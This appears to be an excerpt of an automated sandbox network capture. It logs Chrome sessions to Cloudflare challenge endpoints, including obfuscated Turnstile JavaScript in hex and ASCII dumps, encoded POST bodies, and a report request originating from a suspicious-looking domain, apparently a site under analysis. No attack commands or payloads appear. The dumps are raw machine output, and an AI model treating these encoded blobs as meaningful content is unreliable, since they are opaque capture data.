                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:37:23 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
                                                                  2025-01-13 21:37:23 UTC1369INData Raw: 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 25 32 30 66 65 65 64 62 61 63 6b 25 32 30 72 65 70 6f 72 74 25 32 30 68 61 73 25 32 30 62 65 65 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30
                                                                  Data Ascii: 0a%20parent%20page.","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","testing_only_always_pass":"Testing%20only%2C%20
                                                                  2025-01-13 21:37:23 UTC1369INData Raw: 2c 66 59 2c 67 61 2c 67 67 2c 67 68 2c 67 69 2c 67 73 2c 67 44 2c 67 48 2c 66 30 2c 66 31 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 32 36 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 39 33 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 36 31 30 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 38 36 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39 31 34 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 36 34 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 35 37 29 29 2f 37 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49
                                                                  Data Ascii: ,fY,ga,gg,gh,gi,gs,gD,gH,f0,f1){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(626))/1*(parseInt(gI(1593))/2)+parseInt(gI(610))/3*(-parseInt(gI(1386))/4)+parseInt(gI(914))/5+parseInt(gI(564))/6*(-parseInt(gI(557))/7)+-parseInt(gI
                                                                  2025-01-13 21:37:23 UTC1369INData Raw: 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 79 6f 7a 4a 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 74 69 71 5a 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 65 62 5a 49 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 44 4b 61 41 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 68 49 77 64 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 64 57 59 65 57 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 46 69 56 67 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d
                                                                  Data Ascii: ,i){return h>i},'yozJr':function(h,i){return i==h},'tiqZh':function(h,i){return h<<i},'ebZIt':function(h,i){return h(i)},'DKaAX':function(h,i){return i|h},'hIwdz':function(h,i){return h(i)},'dWYeW':function(h,i){return h>i},'FiVgq':function(h,i){return h-
                                                                  2025-01-13 21:37:23 UTC1369INData Raw: 69 66 28 64 5b 67 59 28 37 36 34 29 5d 28 32 35 36 2c 43 5b 67 59 28 37 39 37 29 5d 28 30 29 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 64 5b 67 59 28 36 36 33 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 67 59 28 39 36 31 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 67 59 28 37 39 37 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 48 3c 3c 31 2e 37 39 7c 4f 26 31 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 67 59 28 39 36 31 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4f 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 67 59 28 31 33 35 37 29 5d 28 48 2c 31 29 7c 4f 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 67
                                                                  Data Ascii: if(d[gY(764)](256,C[gY(797)](0))){for(s=0;s<F;H<<=1,d[gY(663)](I,j-1)?(I=0,G[gY(961)](o(H)),H=0):I++,s++);for(O=C[gY(797)](0),s=0;8>s;H=H<<1.79|O&1,j-1==I?(I=0,G[gY(961)](o(H)),H=0):I++,O>>=1,s++);}else{for(O=1,s=0;s<F;H=d[gY(1357)](H,1)|O,j-1==I?(I=0,G[g
                                                                  2025-01-13 21:37:23 UTC1369INData Raw: 3e 3d 31 2c 73 2b 2b 29 3b 44 2d 2d 2c 64 5b 67 59 28 36 36 33 29 5d 28 30 2c 44 29 26 26 46 2b 2b 7d 66 6f 72 28 4f 3d 32 2c 73 3d 30 3b 64 5b 67 59 28 31 30 34 35 29 5d 28 73 2c 46 29 3b 48 3d 48 3c 3c 31 7c 64 5b 67 59 28 39 38 36 29 5d 28 4f 2c 31 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 67 59 28 39 36 31 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 48 3c 3c 3d 31 2c 6a 2d 31 3d 3d 49 29 7b 47 5b 67 59 28 39 36 31 29 5d 28 6f 28 48 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 49 2b 2b 3b 72 65 74 75 72 6e 20 47 5b 67 59 28 39 37 38 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 67 5a 2c 69 2c 6a 29 7b 72 65 74 75 72 6e 20 67 5a 3d 67 56 2c 69 3d 7b 7d 2c
                                                                  Data Ascii: >=1,s++);D--,d[gY(663)](0,D)&&F++}for(O=2,s=0;d[gY(1045)](s,F);H=H<<1|d[gY(986)](O,1),j-1==I?(I=0,G[gY(961)](o(H)),H=0):I++,O>>=1,s++);for(;;)if(H<<=1,j-1==I){G[gY(961)](o(H));break}else I++;return G[gY(978)]('')},'j':function(h,gZ,i,j){return gZ=gV,i={},
                                                                  2025-01-13 21:37:23 UTC1369INData Raw: 4d 7c 3d 28 64 5b 68 31 28 36 35 31 29 5d 28 30 2c 4f 29 3f 31 3a 30 29 2a 49 2c 49 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 50 3d 4d 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 68 31 28 31 30 30 37 29 5d 28 32 2c 38 29 2c 49 3d 31 3b 64 5b 68 31 28 39 30 36 29 5d 28 49 2c 4e 29 3b 4f 3d 64 5b 68 31 28 31 37 32 31 29 5d 28 4a 2c 4b 29 2c 4b 3e 3e 3d 31 2c 4b 3d 3d 30 26 26 28 4b 3d 6f 2c 4a 3d 64 5b 68 31 28 31 38 39 35 29 5d 28 73 2c 4c 2b 2b 29 29 2c 4d 7c 3d 49 2a 28 30 3c 4f 3f 31 3a 30 29 2c 49 3c 3c 3d 31 29 3b 43 5b 45 2b 2b 5d 3d 65 28 4d 29 2c 50 3d 45 2d 31 2c 44 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 68 31 28 31 30 30 37 29 5d 28 32 2c 31 36 29 2c 49 3d 31 3b 64 5b
                                                                  Data Ascii: M|=(d[h1(651)](0,O)?1:0)*I,I<<=1);switch(P=M){case 0:for(M=0,N=Math[h1(1007)](2,8),I=1;d[h1(906)](I,N);O=d[h1(1721)](J,K),K>>=1,K==0&&(K=o,J=d[h1(1895)](s,L++)),M|=I*(0<O?1:0),I<<=1);C[E++]=e(M),P=E-1,D--;break;case 1:for(M=0,N=Math[h1(1007)](2,16),I=1;d[
                                                                  2025-01-13 21:37:23 UTC1369INData Raw: 38 28 35 32 33 29 5d 5b 68 38 28 31 36 33 31 29 5d 26 26 67 5b 68 38 28 36 37 31 29 5d 3f 67 5b 68 38 28 35 32 33 29 5d 5b 68 38 28 31 36 33 31 29 5d 28 6e 65 77 20 67 5b 28 68 38 28 36 37 31 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 68 61 2c 48 29 7b 66 6f 72 28 68 61 3d 68 38 2c 47 5b 68 61 28 31 36 35 34 29 5d 28 29 2c 48 3d 30 3b 6f 5b 68 61 28 35 31 37 29 5d 28 48 2c 47 5b 68 61 28 38 39 38 29 5d 29 3b 6f 5b 68 61 28 37 35 38 29 5d 28 47 5b 48 5d 2c 47 5b 48 2b 31 5d 29 3f 47 5b 68 61 28 31 33 30 37 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 38 28 39 33 36 29 5d 5b 68 38 28 37 38 37 29 5d 28 42 29 2c 43 3d 30
                                                                  Data Ascii: 8(523)][h8(1631)]&&g[h8(671)]?g[h8(523)][h8(1631)](new g[(h8(671))](x)):function(G,ha,H){for(ha=h8,G[ha(1654)](),H=0;o[ha(517)](H,G[ha(898)]);o[ha(758)](G[H],G[H+1])?G[ha(1307)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[h8(936)][h8(787)](B),C=0
                                                                  2025-01-13 21:37:23 UTC1369INData Raw: 62 28 67 4a 28 35 35 34 29 29 2c 65 4d 5b 67 4a 28 31 31 35 39 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4a 28 31 31 35 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 59 29 7b 69 66 28 68 59 3d 67 4a 2c 65 4d 5b 68 59 28 31 31 35 39 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 68 59 28 31 31 35 39 29 5d 3d 21 21 5b 5d 7d 2c 66 7a 3d 30 2c 65 4e 5b 67 4a 28 31 34 36 39 29 5d 3d 3d 3d 67 4a 28 31 31 34 38 29 3f 65 4e 5b 67 4a 28 31 30 39 38 29 5d 28 67 4a 28 31 34 39 32 29 2c 66 75 6e 63 74 69 6f 6e 28 69 64 2c 63 29 7b 69 64 3d 67 4a 2c 63 3d 7b 27 61 74 62 6f 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 66 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 66 29 7d 7d 2c 63 5b 69 64 28 31 35 36 30 29 5d 28 73 65 74 54 69 6d 65 6f 75 74 2c 66 43 2c 30 29 7d 29 3a 73 65 74 54 69 6d 65
                                                                  Data Ascii: b(gJ(554)),eM[gJ(1159)]=![],eM[gJ(1153)]=function(hY){if(hY=gJ,eM[hY(1159)])return;eM[hY(1159)]=!![]},fz=0,eN[gJ(1469)]===gJ(1148)?eN[gJ(1098)](gJ(1492),function(id,c){id=gJ,c={'atboL':function(d,e,f){return d(e,f)}},c[id(1560)](setTimeout,fC,0)}):setTime
                                                                  2025-01-13 21:37:23 UTC1369INData Raw: 34 36 29 5d 28 69 5b 69 68 28 35 30 36 29 5d 28 69 68 28 38 31 30 29 2c 44 29 2b 69 5b 69 68 28 31 32 32 32 29 5d 2b 31 2b 69 68 28 38 35 32 29 2c 65 4d 5b 69 68 28 36 33 31 29 5d 5b 69 68 28 31 32 38 33 29 5d 29 2c 27 2f 27 29 2b 65 4d 5b 69 68 28 36 33 31 29 5d 2e 63 48 2b 27 2f 27 2b 65 4d 5b 69 68 28 36 33 31 29 5d 5b 69 68 28 36 37 38 29 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 73 5b 69 68 28 31 36 37 36 29 5d 28 69 5b 69 68 28 31 32 31 36 29 5d 28 69 5b 69 68 28 31 31 34 30 29 5d 28 27 76 5f 27 2b 65 4d 5b 69 68 28 36 33 31 29 5d 5b 69 68 28 31 32 38 33 29 5d 2c 27 3d 27 29 2c 6d 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 6f 3d 69 68 28 31 33 34 37 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 73 5b 69 68
                                                                  Data Ascii: 46)](i[ih(506)](ih(810),D)+i[ih(1222)]+1+ih(852),eM[ih(631)][ih(1283)]),'/')+eM[ih(631)].cH+'/'+eM[ih(631)][ih(678)];continue;case'4':s[ih(1676)](i[ih(1216)](i[ih(1140)]('v_'+eM[ih(631)][ih(1283)],'='),m));continue;case'5':o=ih(1347);continue;case'6':s[ih


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  21192.168.2.164974035.190.80.14437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:23 UTC537OUTOPTIONS /report/v4?s=h26TBLVTtzPIJ9qwskmM05jz%2FRcml4h%2BqRQm9ndjxZo%2Bp9rqLiqn26xPkTWlfuMGQDwRW7aTQ5r1ZmIN9tweYD1CYz5xHFGpdQian4USZriP3YfCWz7lwKiNWlGylg%3D%3D HTTP/1.1
                                                                  Host: a.nel.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Origin: https://m7sn.shaceshrov.ru
                                                                  Access-Control-Request-Method: POST
                                                                  Access-Control-Request-Headers: content-type
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:23 UTC336INHTTP/1.1 200 OK
                                                                  Content-Length: 0
                                                                  access-control-max-age: 86400
                                                                  access-control-allow-methods: POST, OPTIONS
                                                                  access-control-allow-origin: *
                                                                  access-control-allow-headers: content-length, content-type
                                                                  date: Mon, 13 Jan 2025 21:37:23 GMT
                                                                  Via: 1.1 google
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  22192.168.2.1649741104.18.94.414437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:23 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/291047480:1736802921:6cAIPi7OVuOlpkf5Flnw52f_YS5aDPw6UYjgs6Pq5ck/901886f16aa00f3b/aug6nWRD8oN0o9STjshe0NwiJi9eHu1Mo_8PWDLYFtY-1736804242-1.1.1.1-iKIFn8UsYFPDX5tWJc7Ywt.PhMZpkhR5BUHWkehojzXA67DeXJ8KQhyBWtcjEArv HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 3200
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  Content-type: application/x-www-form-urlencoded
                                                                  CF-Chl-RetryAttempt: 0
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  CF-Challenge: aug6nWRD8oN0o9STjshe0NwiJi9eHu1Mo_8PWDLYFtY-1736804242-1.1.1.1-iKIFn8UsYFPDX5tWJc7Ywt.PhMZpkhR5BUHWkehojzXA67DeXJ8KQhyBWtcjEArv
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Origin: https://challenges.cloudflare.com
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ercd6/0x4AAAAAAA1mJe-KJqboZa9M/auto/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:23 UTC3200OUTData Raw: 76 5f 39 30 31 38 38 36 66 31 36 61 61 30 30 66 33 62 3d 72 4d 4c 56 48 56 6b 56 6a 56 54 56 52 6e 71 76 6e 71 30 56 6e 44 35 7a 46 65 44 71 37 6e 53 53 71 43 4e 71 35 33 56 6e 6f 71 69 56 35 4c 65 35 78 6f 4c 71 79 25 32 62 6f 71 39 68 6e 42 72 71 57 56 6e 30 4c 71 35 38 4b 4d 66 5a 71 38 7a 71 63 71 6e 4d 71 38 4c 75 33 71 4e 71 66 33 35 53 71 7a 33 2b 4c 71 6a 34 31 71 66 30 77 56 35 47 71 59 78 49 41 4c 61 71 38 63 42 6e 54 32 48 24 71 6e 37 2d 4f 56 39 47 71 67 49 44 6e 77 4f 50 75 33 66 54 34 71 66 72 71 2b 47 6d 74 2b 41 62 74 56 71 2d 53 79 4d 4d 66 6d 74 51 7a 5a 65 71 74 41 44 43 69 71 71 41 71 35 69 5a 77 2d 4f 6c 77 56 71 52 6b 52 56 71 35 52 52 30 71 46 47 61 2b 73 41 66 6b 47 63 62 71 6e 32 30 6e 64 56 71 31 44 6c 73 37 6f 6b 37 58 51 47 71
                                                                  Data Ascii: v_901886f16aa00f3b=rMLVHVkVjVTVRnqvnq0VnD5zFeDq7nSSqCNq53VnoqiV5Le5xoLqy%2boq9hnBrqWVn0Lq58KMfZq8zqcqnMq8Lu3qNqf35Sqz3+Lqj41qf0wV5GqYxIALaq8cBnT2H$qn7-OV9GqgIDnwOPu3fT4qfrq+Gmt+AbtVq-SyMMfmtQzZeqtADCiqqAq5iZw-OlwVqRkRVq5RR0qFGa+sAfkGcbqn20ndVq1Dls7ok7XQGq
                                                                  2025-01-13 21:37:23 UTC751INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:37:23 GMT
                                                                  Content-Type: text/plain; charset=UTF-8
                                                                  Content-Length: 153120
                                                                  Connection: close
                                                                  cf-chl-gen: 6qPzlvVywrTnUnBCtK9addtZecjyw04Kozy+NTRdwguWaLm0OaL45la89FaMTRQP8QT618NEmD3nsAoFiFXj4gRNm1e/pKRhA9DGbLEZGFA48nwCC0q3Og/RuOWmWRvs+aasRy9k7T7TE+obddheIjiVUHL/C5G+jopmEiK4+0QGtVWrk6hm2tQVA9pgjBeH4k3GW6DINDNAeOoOwdRtellM4y7Abj1of0kI3AUzErryVWNKud+4uj4WFSYnLKwtWkx9Eyke0agJFceiuT17NLEa33M6kjwe8rdCtsz2+gL267EdzFemzU9pBjKAIi8XrNv7cOONXrQp4W2QybZ+5Vi4nQGhb8baK6mQJf0C5wgShLMOKqwJ2c1gv31oVJdO/7AbJ63liZ6x5LoCx5Nb0eESuJyp4sl/wAO2YQ+8eOB43FzOjmmlt8CFs40kCNEouAegj7lHsTBxQpXlnGoiDjGLIDsXFNf9gU7AAj5eutc=$cXvfa1xRZNihMIBp9iM6Qg==
                                                                  Server: cloudflare
                                                                  CF-RAY: 901886fbb80715c3-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:37:23 UTC618INData Raw: 62 57 56 50 68 47 46 6c 66 6d 69 48 55 6c 56 30 58 47 68 62 6e 49 47 55 65 33 69 42 58 47 4b 62 6f 6e 31 2f 71 47 4a 71 65 32 65 6f 61 36 2b 54 61 70 4f 77 6e 37 43 6e 71 4c 47 4f 6c 37 7a 41 75 59 79 41 67 62 57 4e 75 4c 4b 55 75 62 4b 63 6e 4d 43 33 77 36 36 74 6d 38 69 73 77 59 7a 4e 79 64 58 46 74 74 72 58 75 4a 6e 64 32 73 36 56 35 4d 2b 34 34 73 58 4a 36 75 76 47 77 4d 48 6a 72 64 72 46 35 36 36 6e 7a 50 65 7a 39 4f 66 6b 31 63 33 2b 41 64 6a 38 75 2f 34 46 32 50 76 57 2b 66 76 59 41 41 34 43 32 65 45 4f 43 38 76 51 45 67 2f 4d 35 2b 72 51 46 75 6e 31 2b 51 72 76 41 66 58 76 33 41 54 62 33 66 50 68 47 50 77 6d 41 75 4d 71 34 51 45 79 4b 53 30 46 2f 75 30 77 39 79 6f 62 4c 77 6a 34 4d 53 6f 67 2b 79 49 6b 4d 69 4d 79 51 78 6f 43 42 45 49 4b 4a 68 6f
                                                                  Data Ascii: bWVPhGFlfmiHUlV0XGhbnIGUe3iBXGKbon1/qGJqe2eoa6+TapOwn7CnqLGOl7zAuYyAgbWNuLKUubKcnMC3w66tm8iswYzNydXFttrXuJnd2s6V5M+44sXJ6uvGwMHjrdrF566nzPez9Ofk1c3+Adj8u/4F2PvW+fvYAA4C2eEOC8vQEg/M5+rQFun1+QrvAfXv3ATb3fPhGPwmAuMq4QEyKS0F/u0w9yobLwj4MSog+yIkMiMyQxoCBEIKJho
                                                                  2025-01-13 21:37:23 UTC1369INData Raw: 30 55 50 54 45 38 56 57 4a 57 5a 79 42 6d 58 44 70 75 50 30 4d 72 5a 57 6b 6d 56 57 31 57 59 46 4e 75 4e 33 73 34 64 6a 56 61 53 6c 78 73 54 49 46 62 67 58 46 57 59 34 75 46 58 6f 5a 49 69 56 2b 41 58 32 78 79 64 48 56 52 6b 4a 64 71 6b 35 5a 56 57 4a 4b 5a 6c 58 5a 65 59 57 42 5a 63 47 46 7a 6b 34 75 43 66 4b 71 44 6a 59 75 72 73 71 2b 6b 74 6f 65 6b 75 35 4b 54 65 6e 69 50 71 4b 32 37 67 71 2b 37 67 4c 4b 42 65 37 4b 73 6f 59 75 4c 74 36 47 66 30 64 4f 31 79 38 2b 71 71 36 32 73 70 63 61 55 72 71 6e 53 6e 71 4c 5a 77 4e 53 78 35 38 6a 62 70 4d 75 6a 71 72 2f 64 33 38 2f 48 33 4f 37 32 71 4e 4b 75 78 2b 66 54 30 73 37 38 33 65 33 7a 2b 65 76 2b 38 75 37 7a 79 4d 59 45 39 4f 44 46 7a 65 6a 38 38 4d 72 77 45 76 30 4c 41 39 67 46 36 51 54 77 44 50 37 33 44
                                                                  Data Ascii: 0UPTE8VWJWZyBmXDpuP0MrZWkmVW1WYFNuN3s4djVaSlxsTIFbgXFWY4uFXoZIiV+AX2xydHVRkJdqk5ZVWJKZlXZeYWBZcGFzk4uCfKqDjYursq+ktoeku5KTeniPqK27gq+7gLKBe7KsoYuLt6Gf0dO1y8+qq62spcaUrqnSnqLZwNSx58jbpMujqr/d38/H3O72qNKux+fT0s783e3z+ev+8u7zyMYE9ODFzej88MrwEv0LA9gF6QTwDP73D
                                                                  2025-01-13 21:37:23 UTC1369INData Raw: 6e 52 44 59 35 53 31 56 42 5a 6e 46 42 4c 6d 39 77 63 57 42 6e 4c 33 70 31 57 6b 70 63 53 7a 64 66 61 6d 42 79 64 33 4a 41 61 44 39 36 67 47 46 61 58 46 68 46 6a 6f 36 45 6a 33 31 6a 63 45 32 44 61 6d 68 34 54 70 70 59 6e 5a 32 4f 6b 33 64 73 6e 48 31 67 6f 32 6c 6f 66 58 56 38 66 57 61 73 6f 72 4e 37 66 36 69 6a 64 4c 4f 4a 6a 5a 47 45 69 5a 31 36 75 37 57 4e 6a 34 36 31 6d 49 4b 64 74 36 4f 62 76 71 53 6d 69 37 36 65 73 5a 36 38 73 38 4b 4f 6b 38 57 53 78 62 75 75 32 38 69 64 71 70 32 39 31 64 47 34 33 75 48 47 30 72 36 6c 6f 2b 37 45 70 73 62 66 78 63 47 73 30 66 4c 46 2b 63 50 4b 79 2f 48 62 33 39 48 42 37 39 7a 33 75 2b 41 47 39 38 62 41 2b 65 50 46 34 39 33 65 32 64 76 66 34 76 59 59 44 41 6e 56 47 2b 37 36 7a 78 30 61 45 67 34 6a 44 76 50 31 4a 79
                                                                  Data Ascii: nRDY5S1VBZnFBLm9wcWBnL3p1WkpcSzdfamByd3JAaD96gGFaXFhFjo6Ej31jcE2Damh4TppYnZ2Ok3dsnH1go2lofXV8fWasorN7f6ijdLOJjZGEiZ16u7WNj461mIKdt6ObvqSmi76esZ68s8KOk8WSxbuu28idqp291dG43uHG0r6lo+7EpsbfxcGs0fLF+cPKy/Hb39HB79z3u+AG98bA+ePF493e2dvf4vYYDAnVG+76zx0aEg4jDvP1Jy
                                                                  2025-01-13 21:37:23 UTC1369INData Raw: 5a 57 5a 45 54 54 78 6b 55 79 35 30 57 54 56 32 52 46 5a 56 63 34 42 61 56 6a 39 68 4f 6f 56 64 64 6c 46 52 52 46 65 4b 58 6b 52 37 67 30 4e 79 69 59 47 45 56 6f 4a 74 55 6e 43 53 61 6c 6c 78 67 48 36 64 57 61 43 67 58 48 43 68 63 48 61 6f 68 48 32 69 6c 34 6d 6d 69 61 32 4f 71 4c 43 66 71 72 47 69 72 6f 71 6b 64 35 65 6e 66 70 46 35 72 4a 75 65 67 4b 69 2f 76 4a 57 63 6d 38 50 49 77 61 71 51 79 63 4b 7a 6e 39 4f 50 30 4b 72 58 74 4a 62 52 6d 35 71 2b 74 62 58 50 34 4c 6d 30 32 37 6d 6f 75 65 6e 5a 33 38 37 62 38 64 32 37 72 76 58 47 72 38 6a 59 37 75 58 4c 78 75 72 75 75 66 54 39 7a 4e 53 2b 77 64 37 36 39 41 58 6a 39 74 58 37 42 73 6e 47 37 76 45 52 36 64 4c 31 39 66 48 58 45 64 54 30 39 66 6f 41 32 2f 63 55 48 2b 38 67 44 77 49 67 45 75 54 38 4c 43 54
                                                                  Data Ascii: ZWZETTxkUy50WTV2RFZVc4BaVj9hOoVddlFRRFeKXkR7g0NyiYGEVoJtUnCSallxgH6dWaCgXHChcHaohH2il4mmia2OqLCfqrGiroqkd5enfpF5rJuegKi/vJWcm8PIwaqQycKzn9OP0KrXtJbRm5q+tbXP4Lm027mouenZ387b8d27rvXGr8jY7uXLxuruufT9zNS+wd769AXj9tX7BsnG7vER6dL19fHXEdT09foA2/cUH+8gDwIgEuT8LCT
